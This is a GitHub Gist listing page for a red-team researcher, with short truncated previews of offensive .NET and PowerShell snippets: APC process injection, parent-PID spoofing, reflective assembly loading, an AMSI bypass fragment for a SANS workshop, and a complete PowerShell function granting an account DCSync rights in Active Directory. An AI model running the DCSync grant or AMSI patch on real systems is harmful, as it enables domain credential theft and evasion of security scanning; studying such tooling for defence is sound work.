Jean-François Maes jfmaes
jfmaes
/ DInjectQueuerAPC.cs
Created
November 13, 2020 19:00
.NET Process injection in a new process with QueueUserAPC using D/invoke - compatible with gadgettojscript
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Diagnostics; | |
| using System.IO; | |
| using System.Runtime.InteropServices; | |
| namespace DinjectorWithQUserAPC | |
| { | |
| public class Program |
jfmaes
/ functionextract.py
Created
April 26, 2023 07:35
MSDN function definition scraper. requires chromium driver.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import argparse | |
| import selenium as se | |
| from selenium import webdriver | |
| from bs4 import BeautifulSoup | |
| import time | |
| def main(): | |
| parser = argparse.ArgumentParser(description = 'extract function definitions from MSDN') | |
| parser.add_argument('--methods', help='list of methods',required=True) | |
| args = parser.parse_args() | |
| #methods_list = [] |
jfmaes
/ pidspoofDinvoke.cs
Last active
January 17, 2023 02:28
PIDSpoof-DInvoke-Dev-Nuget-NoDynamicAPIIInvoke
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Runtime.InteropServices; | |
| using System.Diagnostics; | |
| namespace DInvoke_PIDSpoof_DevNuget | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ntdll.dll | |
| DbgQueryDebugFilterState from ntdll.dll | |
| DbgQueryDebugFilterState from ntdll.dll | |
| DbgQueryDebugFilterState from ntdll.dll | |
| DbgSetDebugFilterState from ntdll.dll | |
| EtwpGetCpuSpeed from ntdll.dll | |
| LdrAccessResource from ntdll.dll | |
| LdrCallEnclave from ntdll.dll | |
| LdrProcessRelocationBlockEx from ntdll.dll | |
| NtQuerySystemTime from ntdll.dll |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-SyncMeUp{ | |
| [CmdletBinding()] | |
| Param ( | |
| [Parameter(Mandatory=$True)] | |
| [string]$AccountName | |
| ) | |
| $dse = [ADSI]"LDAP://Rootdse" | |
| $namingcontext = $dse.defaultNamingContext | |
| echo "Giving $AccountName DCSync rights" | |
| dsacls.exe $namingcontext /G $AccountName":CA;Replicating Directory Changes All" $AccountName":CA;Replicating Directory Changes" |
jfmaes
/ AppDomainResolveTest.cs
Created
December 21, 2020 09:53
example ingestor of NvisoLib for the blogpost
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using NvisoLib; | |
| using System.Reflection; | |
| namespace AppDomainResolveTest | |
| { | |
| class Program | |
| { | |
| static void Main(string[] args) | |
| { |
jfmaes
/ reflectiondemo.ps1
Created
December 21, 2020 09:09
Sample Reflection of the HelloFromDotNetFramework assembly for the blogpost
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| clear | |
| $bytes=[System.IO.File]::ReadAllBytes("C:\Users\jeanm\source\repos\HelloFromDotNetFramework\bin\Release\HelloFromDotNetFramework.exe") | |
| $asm = [System.Reflection.Assembly]::Load($bytes) | |
| $params = {null} | |
| [HelloFromDotNetFramework.Program]::Main($params) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import argparse | |
| from ipaddress import IPv4Network | |
| import os | |
| def banner(): | |
| print(r""" | |
| c=====e | |
| H | |
| ____________ _,,_H____ |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Hi SANS Workshop Attendees! Reflection is super fun! | |
| amsi.dll | |
| AmsiScanBuffer | |
| uFcAB4DD |
jfmaes
/ ssl-scraper.py
Last active
September 10, 2021 16:52
extract hostnames based on SSL certificates
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import requests | |
| from socket import * | |
| from requests.packages.urllib3.contrib import pyopenssl as reqs | |
| from requests.packages.urllib3.exceptions import InsecureRequestWarning | |
| requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
| import argparse | |
| import ipaddress | |
| #import asyncio |
NewerOlder